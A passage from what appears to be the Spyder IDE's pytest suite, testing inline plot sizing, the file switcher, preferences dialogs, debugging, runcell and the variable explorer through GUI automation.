fig_width = float(CONF.get('ipython_console', 'pylab/inline/width'))
fig_height = float(CONF.get('ipython_console', 'pylab/inline/height'))
# Wait until the window is fully up.
shell = main_window.ipyconsole.get_current_shellwidget()
client = main_window.ipyconsole.get_current_client()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Generate a plot inline with bbox_inches=tight (since it is default) and
# save the figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches='tight',\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# Change the option so that bbox_inches=None.
CONF.set('ipython_console', 'pylab/inline/bbox_inches', False)
# Restart the kernel and wait until it's up again
shell._prompt_html = None
client.restart_kernel()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate the same plot inline, this time with bbox_inches=None, and save
# the figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches=None,\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
@flaky(max_runs=3)
@pytest.mark.slow
def test_switcher(main_window, qtbot, tmpdir):
"""Test the use of shorten paths when necessary in the switcher."""
switcher = main_window.switcher
# Assert that the full path of a file is shown in the switcher
file_a = tmpdir.join('test_file_a.py')
file_a.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file_a))
main_window.open_switcher()
switcher_paths = [switcher.model.item(item_idx).get_description()
for item_idx in range(switcher.model.rowCount())]
assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75
switcher.close()
# Assert that long paths are shortened in the switcher
dir_b = tmpdir
for _ in range(3):
dir_b = dir_b.mkdir(str(uuid.uuid4()))
file_b = dir_b.join('test_file_b.py')
file_b.write('bar\n')
main_window.editor.load(str(file_b))
main_window.open_switcher()
file_b_text = switcher.model.item(
switcher.model.rowCount() - 1).get_description()
assert '...' in file_b_text
switcher.close()
# Assert search works correctly
search_texts = ['test_file_a', 'file_b', 'foo_spam']
expected_paths = [file_a, file_b, None]
for search_text, expected_path in zip(search_texts, expected_paths):
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, search_text)
qtbot.wait(200)
assert switcher.count() == bool(expected_path)
switcher.close()
# Assert symbol switcher works
main_window.editor.set_current_filename(str(file_a))
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, '@')
qtbot.wait(200)
assert switcher.count() == 2
switcher.close()
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_switcher_dlg(main_window, tmpdir):
"""
Test that the file switcher is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file_open_switcher_dlg.py')
file.write("a test file for test_edidorstack_open_switcher_dlg")
main_window.editor.load(str(file))
# Test that the file switcher opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_switcher_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert (editorstack.switcher_dlg.count() ==
len(main_window.editor.get_filenames()))
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir):
"""
Test that the symbol finder is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file.py')
file.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file))
# Test that the symbol finder opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_symbolfinder_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert editorstack.switcher_dlg.count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Times out sometimes on macOS")
def test_run_static_code_analysis(main_window, qtbot):
"""This tests that the Pylint plugin is working as expected."""
# Select the third-party plugin
pylint_plugin = get_thirdparty_plugin(main_window, "Code Analysis")
# Do an analysis
test_file = osp.join(LOCATION, 'script_pylint.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
qtbot.keyClick(code_editor, Qt.Key_F8)
qtbot.wait(3000)
# Perform the test
# Check output of the analysis
treewidget = pylint_plugin.get_focus_widget()
qtbot.waitUntil(lambda: treewidget.results is not None,
timeout=SHELL_TIMEOUT)
result_content = treewidget.results
assert result_content['C:']
pylint_version = LooseVersion(pylint.__version__)
if pylint_version < LooseVersion('2.5.0'):
number_of_conventions = 5
else:
number_of_conventions = 3
assert len(result_content['C:']) == number_of_conventions
# Close the file
main_window.editor.close_file()
@flaky(max_runs=3)
def test_troubleshooting_menu_item_and_url(monkeypatch):
"""Test that the troubleshooting menu item calls the valid URL."""
MockMainWindow = MagicMock(spec=MainWindow)
mockMainWindow_instance = MockMainWindow()
mockMainWindow_instance.__class__ = MainWindow
MockQDesktopServices = Mock()
mockQDesktopServices_instance = MockQDesktopServices()
attr_to_patch = ('spyder.app.mainwindow.QDesktopServices')
monkeypatch.setattr(attr_to_patch, MockQDesktopServices)
# Unit test of help menu item: Make sure the correct URL is called.
MainWindow.trouble_guide(mockMainWindow_instance)
assert MockQDesktopServices.openUrl.call_count == 1
mockQDesktopServices_instance.openUrl.called_once_with(__trouble_url__)
# Check that the URL resolves correctly. Ignored if no internet connection.
try:
urlopen("https://www.github.com", timeout=1)
except Exception:
pass
else:
try:
urlopen(__trouble_url__, timeout=1)
except URLError:
raise
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows")
def test_help_opens_when_show_tutorial_full(main_window, qtbot):
"""
Test fix for spyder-ide/spyder#6317.
'Show tutorial' opens the help plugin if closed.
"""
HELP_STR = "Help"
help_pane_menuitem = None
for action in main_window.plugins_menu.actions():
if action.text() == HELP_STR:
help_pane_menuitem = action
break
# Test opening the tutorial with the Help plugin closed
main_window.help.toggle_view_action.setChecked(False)
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert help_tabbar is None and help_index is None
assert not isinstance(main_window.focusWidget(), ObjectComboBox)
assert not help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open, but not selected
help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1)
% help_tabbar.count())
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index != help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open and the active tab
qtbot.wait(500)
main_window.help.show_tutorial()
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
qtbot.wait(500)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
def test_report_issue_url(monkeypatch):
"""Test that report_issue sends the data, and to correct url."""
body = 'This is an example error report body text.'
title = 'Uncreative issue title here'
body_autogenerated = 'Auto-generated text.'
target_url_base = __project_url__ + '/issues/new'
MockMainWindow = MagicMock(spec=MainWindow)
mockMainWindow_instance = MockMainWindow()
mockMainWindow_instance.__class__ = MainWindow
mockMainWindow_instance.render_issue.return_value = body_autogenerated
MockQDesktopServices = MagicMock()
mockQDesktopServices_instance = MockQDesktopServices()
attr_to_patch = ('spyder.app.mainwindow.QDesktopServices')
monkeypatch.setattr(attr_to_patch, MockQDesktopServices)
# Test when body != None, i.e. when auto-submitting error to Github
target_url = QUrl(target_url_base + '?body=' + body)
MainWindow.report_issue(mockMainWindow_instance, body=body, title=None,
open_webpage=True)
assert MockQDesktopServices.openUrl.call_count == 1
mockQDesktopServices_instance.openUrl.called_with(target_url)
# Test when body != None and title != None
target_url = QUrl(target_url_base + '?body=' + body
+ "&title=" + title)
MainWindow.report_issue(mockMainWindow_instance, body=body, title=title,
open_webpage=True)
assert MockQDesktopServices.openUrl.call_count == 2
mockQDesktopServices_instance.openUrl.called_with(target_url)
def test_render_issue():
"""Test that render issue works without errors and returns text."""
test_description = "This is a test description"
test_traceback = "An error occurred. Oh no!"
MockMainWindow = MagicMock(spec=MainWindow)
mockMainWindow_instance = MockMainWindow()
mockMainWindow_instance.__class__ = MainWindow
# Test when description and traceback are not provided
test_issue_1 = MainWindow.render_issue(mockMainWindow_instance)
assert type(test_issue_1) == str
assert len(test_issue_1) > 100
# Test when description and traceback are provided
test_issue_2 = MainWindow.render_issue(mockMainWindow_instance,
test_description, test_traceback)
assert type(test_issue_2) == str
assert len(test_issue_2) > 100
assert test_description in test_issue_2
assert test_traceback in test_issue_2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
sys.platform.startswith('linux'), reason="It segfaults on Linux")
def test_custom_layouts(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
mw = main_window
mw.first_spyder_run = False
prefix = 'window' + '/'
settings = mw.load_window_settings(prefix=prefix, default=True)
# Test layout changes
for layout_idx in ['default'] + list(range(4)):
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
layout = mw.setup_default_layouts(layout_idx, settings=settings)
with qtbot.waitSignal(None, timeout=500, raising=False):
# Add a wait to see changes
pass
widgets_layout = layout['widgets']
hidden_widgets = layout['hidden widgets']
for column in widgets_layout:
for row in column:
for idx, widget in enumerate(row):
if idx == 0:
if widget not in hidden_widgets:
print(widget) # spyder: test-skip
try:
# Old API
assert widget.isVisible()
except AttributeError:
# New API
assert widget.get_widget().isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
def test_save_on_runfile(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
# Load test file
test_file = osp.join(LOCATION, 'script.py')
test_file_copy = test_file[:-3] + '_copy.py'
shutil.copyfile(test_file, test_file_copy)
main_window.editor.load(test_file_copy)
code_editor = main_window.editor.get_focus_widget()
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
qtbot.keyClicks(code_editor, 'test_var = 123', delay=100)
filename = code_editor.filename
with qtbot.waitSignal(shell.sig_prompt_ready):
shell.execute('runfile("{}")'.format(remove_backslashes(filename)))
assert shell.get_value('test_var') == 123
main_window.editor.close_file()
os.remove(test_file_copy)
@pytest.mark.slow
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_pylint_follows_file(qtbot, tmpdir, main_window):
"""Test that file editor focus change updates pylint combobox filename."""
for plugin in main_window.thirdparty_plugins:
if plugin.CONF_SECTION == 'pylint':
pylint_plugin = plugin
break
# Show pylint plugin
pylint_plugin.dockwidget.show()
pylint_plugin.dockwidget.raise_()
# Create base temporary directory
basedir = tmpdir.mkdir('foo')
# Open some files
for idx in range(2):
fh = basedir.join('{}.py'.format(idx))
fname = str(fh)
fh.write('print("Hello world!")')
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Create an editor split
main_window.editor.editorsplitter.split(orientation=Qt.Vertical)
qtbot.wait(500)
# Open other files
for idx in range(4):
fh = basedir.join('{}.py'.format(idx))
fh.write('print("Hello world!")')
fname = str(fh)
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Close split panel
for editorstack in reversed(main_window.editor.editorstacks):
editorstack.close_split()
break
qtbot.wait(1000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_report_comms_error(qtbot, main_window):
"""Test if a comms error is correctly displayed."""
CONF.set('main', 'show_internal_errors', True)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a bogus get_cwd
with qtbot.waitSignal(shell.executed):
shell.execute('def get_cwd(): import foo')
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm."
"register_call_handler('get_cwd', get_cwd)")
with qtbot.waitSignal(shell.executed, timeout=3000):
shell.execute('ls')
error_dialog = main_window.console.error_dialog
assert error_dialog is not None
assert 'Exception in comms call get_cwd' in error_dialog.error_traceback
assert 'No module named' in error_dialog.error_traceback
main_window.console.close_error_dialog()
CONF.set('main', 'show_internal_errors', False)
@pytest.mark.slow
@flaky(max_runs=3)
def test_break_while_running(main_window, qtbot, tmpdir):
"""Test that we can set breakpoints while running."""
# Create loop
code = ("import time\n"
"for i in range(100):\n"
" print(i)\n"
" time.sleep(0.1)\n"
)
p = tmpdir.join("loop_script.py")
p.write(code)
test_file = to_text_string(p)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Load test file
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Click the debug button
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Continue debugging
qtbot.keyClick(shell._control, 'c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.wait(500)
# Set a breakpoint
code_editor.debugger.toogle_breakpoint(line_number=3)
# We should drop into the debugger
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClick(shell._control, 'q')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.wait(500)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# --- Preferences
# ----------------------------------------------------------------------------
def preferences_dialog_helper(qtbot, main_window, section):
"""
Open preferences dialog and select page with `section` (CONF_SECTION).
"""
main_window.show_preferences()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg = main_window.prefs_dialog_instance
index = dlg.get_index_by_name(section)
page = dlg.get_page(index)
dlg.set_current_index(index)
return dlg, index, page
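# Usage sketch (illustrative only, mirroring the tests below): open a page
# with the helper above, interact with it, then accept the dialog and wait for
# the instance to be destroyed. The helper name is an assumption.
def _example_use_preferences_dialog(qtbot, main_window):
    dlg, index, page = preferences_dialog_helper(qtbot, main_window,
                                                 'appearance')
    dlg.ok_btn.animateClick()
    qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
                    timeout=5000)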
@pytest.mark.slow
def test_preferences_checkboxes_not_checked_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder#10139 regression.
Enabling codestyle/docstyle in the completion section of Preferences
was not updating correctly.
"""
# Reset config
CONF.set('lsp-server', 'pycodestyle', False)
CONF.set('lsp-server', 'pydocstyle', False)
# Open completion preferences and update options
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'lsp-server')
# Get the correct tab pages inside the Completion preferences page
tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())]
tab_widgets = {
tnames.index('code style'): page.code_style_check,
tnames.index('docstring style'): page.docstring_style_check,
}
for idx, check in tab_widgets.items():
page.tabs.setCurrentIndex(idx)
check.animateClick()
qtbot.wait(500)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
# Check the menus are correctly updated
count = 0
for menu_item in main_window.source_menu_actions:
if menu_item and isinstance(menu_item, QAction):
print(menu_item.text(), menu_item.isChecked())
if 'code style' in menu_item.text():
assert menu_item.isChecked()
count += 1
elif 'docstring style' in menu_item.text():
assert menu_item.isChecked()
count += 1
assert count == 2
# Reset config
CONF.set('lsp-server', 'pycodestyle', False)
CONF.set('lsp-server', 'pydocstyle', False)
@pytest.mark.slow
def test_preferences_change_font_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder#10284 regression.
Changing the font resulted in an error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'appearance')
for fontbox in [page.plain_text_font.fontbox,
page.rich_text_font.fontbox]:
fontbox.setFocus()
idx = fontbox.currentIndex()
fontbox.setCurrentIndex(idx + 1)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
def test_preferences_shortcut_reset_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder#11132 regression.
Resetting a shortcut resulted in an error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'shortcuts')
page.reset_to_default(force=True)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
def test_preferences_change_interpreter(qtbot, main_window):
"""Test that on main interpreter change signal is emitted."""
# Check original pyls configuration
lsp = main_window.completions.get_client('lsp')
config = lsp.generate_python_config()
jedi = config['configurations']['pyls']['plugins']['jedi']
assert jedi['environment'] is None
assert jedi['extra_paths'] == []
# Change main interpreter on preferences
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
page.cus_exec_radio.setChecked(True)
page.cus_exec_combo.combobox.setCurrentText(sys.executable)
with qtbot.waitSignal(main_window.sig_main_interpreter_changed,
timeout=5000, raising=True):
dlg.ok_btn.animateClick()
# Check updated pyls configuration
config = lsp.generate_python_config()
jedi = config['configurations']['pyls']['plugins']['jedi']
assert jedi['environment'] == sys.executable
assert jedi['extra_paths'] == []
@pytest.mark.slow
def test_preferences_last_page_is_loaded(qtbot, main_window):
# Test that the last used page is selected again when the dialog is reopened
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
main_window.show_preferences()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg = main_window.prefs_dialog_instance
assert dlg.get_current_index() == index
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_go_to_definition(main_window, qtbot, capsys):
"""Test that go-to-definition works as expected."""
# --- Code that gives no definition
code_no_def = dedent("""
from qtpy.QtCore import Qt
Qt.FramelessWindowHint""")
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_no_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to
# FramelessWindowHint
code_editor.move_cursor(-1)
with qtbot.waitSignal(code_editor.lsp_response_signal):
code_editor.go_to_definition_from_cursor()
# Capture stderr and assert there are no errors
sys_stream = capsys.readouterr()
assert sys_stream.err == u''
# --- Code that gives definition
code_def = "import qtpy.QtCore"
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_def)
n_editors = len(main_window.editor.get_filenames())
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to QtCore
code_editor.move_cursor(-1)
with qtbot.waitSignal(code_editor.lsp_response_signal):
code_editor.go_to_definition_from_cursor()
def _get_filenames():
return [osp.basename(f) for f in main_window.editor.get_filenames()]
qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames())
assert 'QtCore.py' in _get_filenames()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin' and not PY2,
reason="It times out on macOS/PY3")
def test_debug_unsaved_file(main_window, qtbot):
"""Test that we can debug an unsaved file."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text('print(0)\nprint(1)\nprint(2)')
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Start debugging
qtbot.mouseClick(debug_button, Qt.LeftButton)
# There is a breakpoint, so it should continue
qtbot.waitUntil(
lambda: 'ipdb> continue' in shell._control.toPlainText())
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
assert "1---> 2 print(1)" in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [True, False])
def test_runcell(main_window, qtbot, tmpdir, debug):
"""Test the runcell command."""
# Write code with a cell to a file
code = u"result = 10; fname = __file__"
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
if debug:
function = 'debugcell'
else:
function = 'runcell'
# Execute runcell
shell.execute(function + u"(0, r'{}')".format(to_text_string(p)))
control = main_window.ipyconsole.get_focus_widget()
if debug:
# Continue
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
# Continue execution to run the rest of the cell
shell.pdb_execute('c')
qtbot.wait(1000)
# Verify that the `result` variable is defined
assert shell.get_value('result') == 10
# Verify that the `fname` variable is `cell-test.py`
assert "cell-test.py" in shell.get_value('fname')
# Verify that the `__file__` variable is undefined
try:
shell.get_value('__file__')
assert False
except KeyError:
pass
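# Helper sketch (not part of the original tests): several tests build the
# runcell/debugcell command string by hand, quoting the file path as a raw
# string literal; a small helper like this keeps that pattern in one place.
def _example_runcell_command(cell_index, filename, debug=False):
    function = 'debugcell' if debug else 'runcell'
    return u"{}({}, r'{}')".format(function, cell_index, filename)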
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_rename(main_window, qtbot, tmpdir):
"""
Test renaming a variable.
Regression test for spyder-ide/spyder#10735
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Rename one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.rename_item(new_name='arr2')
# Wait until all objects have updated in the variable explorer
def data(cm, i, j):
return cm.data(cm.index(i, j))
qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2',
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr2'
assert data(nsb.editor.model, 2, 0) == 'li'
assert data(nsb.editor.model, 3, 0) == 's'
# ---- Run file again ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5,
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr'
assert data(nsb.editor.model, 2, 0) == 'arr2'
assert data(nsb.editor.model, 3, 0) == 'li'
assert data(nsb.editor.model, 4, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_remove(main_window, qtbot, tmpdir):
"""
Test removing a variable.
Regression test for spyder-ide/spyder#10709
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Remove one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.remove_item(force=True)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3,
timeout=EVAL_TIMEOUT)
def data(cm, i, j):
assert cm.rowCount() == 3
return cm.data(cm.index(i, j))
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'li'
assert data(nsb.editor.model, 2, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_refresh(main_window, qtbot):
"""
Test refreshing the variable explorer while the kernel is executing.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
control = main_window.ipyconsole.get_focus_widget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
shell.execute("import time\n"
"for i in range(10):\n"
" print('i = {}'.format(i))\n"
" time.sleep(.1)\n")
qtbot.waitUntil(lambda: "i = 0" in control.toPlainText())
qtbot.wait(300)
# Get value object
nsb = main_window.variableexplorer.get_focus_widget()
# This is empty
assert len(nsb.editor.source_model._data) == 0
nsb.refresh_table()
qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1)
assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_edge_cases(main_window, qtbot, tmpdir):
"""
Test if runcell works with an unnamed cell at the top of the file
and with an empty cell.
"""
# Write code with a cell to a file
code = ('if True:\n'
' a = 1\n'
'#%%')
p = tmpdir.join("test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
code_editor = main_window.editor.get_focus_widget()
# call runcell
